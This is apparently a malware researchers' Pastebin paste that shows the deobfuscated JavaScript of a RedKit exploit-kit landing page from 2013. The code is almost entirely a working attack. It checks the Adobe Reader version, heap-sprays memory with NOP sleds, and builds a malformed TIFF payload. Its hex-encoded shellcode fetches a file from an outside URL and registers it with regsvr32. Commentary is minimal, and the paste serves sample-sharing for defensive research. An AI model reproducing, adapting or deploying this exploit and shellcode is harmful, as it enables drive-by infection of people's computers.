Advertisement
MalwareMustDie

RedKit - Landing page script 20120112-3

Jan 11th, 2013
937
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
JavaScript 4.59 KB | None
 1. //decode...get the eval() <-- just run it as per it is..
 2.  
 3. Midias = unescape(gerpsoi.replace(/CHoedsp/g, dsprpa.charAt(1)));
 4.  
 5. // written values:
 6.  
 7. /*dbgbgfgd dswd*/var doogo = 'ikgoweewepowehjw[hhwehweh';
 8. var j_IgC = [31, 31, 15, 23];
 9. function _k_m(){
 10.   return app;
 11. }
 12. function _b_(xVgFqV){
 13.   var ___N = '';
 14.   ___N = unescape(xVgFqV);
 15.   return ___N;
 16. }
 17. function get_ver(){
 18.   var ver = _k_m().viewerVersion.toString();
 19.   ver = ver.replace('.', '');
 20.   while (ver.length < 4){
 21.     ver += '0';
 22.   }
 23.   ver = parseInt(ver, 10);
 24.   return ver;
 25. }
 26. function make_block(xVgFqV, len){
 27.   while (xVgFqV.length * 2 < len){
 28.     xVgFqV += xVgFqV;
 29.   }
 30.   xVgFqV = xVgFqV.substring(0, len / 2);
 31.   return xVgFqV;
 32. }
 33. function heap_spray3(scode){
 34.   scode = _b_(scode);
 35.   var sclen = scode.length * 2;
 36.   var fxcvxx = _b_('%u9090');
 37.   var spray = make_block(fxcvxx, 0x2000 - sclen);
 38.   var block = scode + spray;
 39.   block = make_block(block, 0x80000 - 0x40);
 40.   for (var i = 0; i < 0x190; i ++ ){
 41.     j_IgC[i] = block.substr(0, block.length - 1) + fxcvxx;
 42.   }
 43.   return ;
 44. }
 45. function make_str(xVgFqV, len){
 46.   while (xVgFqV.length < len){
 47.     xVgFqV += xVgFqV;
 48.   }
 49.   xVgFqV = xVgFqV.substring(0, len);
 50.   return xVgFqV;
 51. }
 52. function num2hex(num){
 53.   var xVgFqV = num.toString(16);
 54.   var len = xVgFqV.length;
 55.   var ret = (len % 2) ? '0' + xVgFqV : xVgFqV;
 56.   return ret;
 57. }
 58. function str2uni(xVgFqV){
 59.   var ret = '';
 60.   for (var i = 0; i < xVgFqV.length; i += 2){
 61.     ret += '%u';
 62.     ret += num2hex(xVgFqV.charCodeAt(i + 1));
 63.     ret += num2hex(xVgFqV.charCodeAt(i));
 64.   }
 65.   return ret;
 66. }
 67. function hex2str(hex){
 68.   var ret = '';
 69.   for (var i = 0; i < hex.length; i += 2){
 70.     var b = hex.substr(i, 2);
 71.     var num = parseInt(b, 16);
 72.     ret += String.fromCharCode(num);
 73.   }
 74.   return ret;
 75. }
 76. splaui();
 77. function splaui(){
 78.   var ver = get_ver();
 79.   if (ver >= 0x1f40){
 80.     var tiff = 'SUkqADggAABB';
 81.     var nops = make_str('QUFB', 0x2ae8);
 82.     var start = '
 83. QQcAAAEDAAEAAAAwIAAAAQEDAAEAAAABAAAAAwEDAAEAAAABAAAABgEDAAEAAAABAAAAEQEEAAEAAAAIAAAAFwEEAA
 84. EAAAAwIAAAUAEDAMwAAACSIAAAAAAAAAAMDAj/////';
 85.     var foot = '';
 86.     var sc_hex = '';
 87.     if (ver < 0x2009){
 88.       foot = 'o+uASjgggkpuL4BK/////wAAAABAAAAAAAAAAAAQAAAAAAAAfhaASiAgYA98EIBK';
 89.       var sc_hex = '
 90. 4c20600f0517804a3c20600f0f63804aa3eb804a3020824a6e2f804a4141414126000000000000000000000000
 91. 0000001239804a6420600f0004000041414141414141416683e4fcfc85e47534e95f33c0648b40308b400c8b70
 92. 1c568b760833db668b5e3c0374332c81ee1510ffffb88b4030c346390675fb87342485e47551e9eb4c51568b75
 93. 3c8b74357803f5568b762003f533c94941fcad03c533db0fbe1038f27408c1cb0d03da40ebf13b1f75e65e8b5e
 94. 2403dd668b0c4b8d46ecff54240c8bd803dd8b048b03c5ab5e59c3eb53ad8b6820807d0c33740396ebf38b6808
 95. 8bf76a0559e898ffffffe2f9e80000000058506a4068ff0000005083c01950558bec8b5e1083c305ffe3686f6e
 96. 00006875726c6d54ff1683c4088be8e861ffffffeb02eb7281ec040100008d5c240cc7042472656773c7442404
 97. 76723332c7442408202d73205368f8000000ff560c8be833c951c7441d0077706274c7441d052e646c6cc6441d
 98. 0900598ac1043088441d0441516a006a0053576a00ff561485c075166a0053ff56046a0083eb0c53ff560483c3
 99. 0ceb02eb1347803f0075fa47803f0075c46a006afeff5608e89cfeffff8e4e0eec98fe8a0e896f01bd33ca8a5b
 100. 1bc64679361a2f70687474703a2f2f77696e6465726d657265636f74746167652e636f2e756b2f36322e68746d
 101. 6c0000';
 102.     }
 103.     else {
 104.       foot = 'kB+ASjiQhEp9foBK/////wAAAABAAAAAAAAAAAAQAAAAAAAAYxCASiAgYA/fE4BK';
 105.       sc_hex = '
 106. 4c20600fa563804a3c20600f9621804a901f804a3090844a7d7e804a4141414126000000000000000000000000
 107. 0000007188804a6420600f0004000041414141414141416683e4fcfc85e47534e95f33c0648b40308b400c8b70
 108. 1c568b760833db668b5e3c0374332c81ee1510ffffb88b4030c346390675fb87342485e47551e9eb4c51568b75
 109. 3c8b74357803f5568b762003f533c94941fcad03c533db0fbe1038f27408c1cb0d03da40ebf13b1f75e65e8b5e
 110. 2403dd668b0c4b8d46ecff54240c8bd803dd8b048b03c5ab5e59c3eb53ad8b6820807d0c33740396ebf38b6808
 111. 8bf76a0559e898ffffffe2f9e80000000058506a4068ff0000005083c01950558bec8b5e1083c305ffe3686f6e
 112. 00006875726c6d54ff1683c4088be8e861ffffffeb02eb7281ec040100008d5c240cc7042472656773c7442404
 113. 76723332c7442408202d73205368f8000000ff560c8be833c951c7441d0077706274c7441d052e646c6cc6441d
 114. 0900598ac1043088441d0441516a006a0053576a00ff561485c075166a0053ff56046a0083eb0c53ff560483c3
 115. 0ceb02eb1347803f0075fa47803f0075c46a006afeff5608e89cfeffff8e4e0eec98fe8a0e896f01bd33ca8a5b
 116. 1bc64679361a2f70687474703a2f2f77696e6465726d657265636f74746167652e636f2e756b2f36322e68746d
 117. 6c0000';
 118.     }
 119.     if (foot.length){
 120.       var ret = [tiff, nops, start, foot].join('');
 121.       var sc_str = hex2str(sc_hex);
 122.       var scode = str2uni(sc_str);
 123.       heap_spray3(scode);
 124.       rVBGo.rawValue = ret;
 125.     }
 126.   }
 127. }
 128. #malwareMustDie!
Advertisement
RAW Paste Data Copied
Advertisement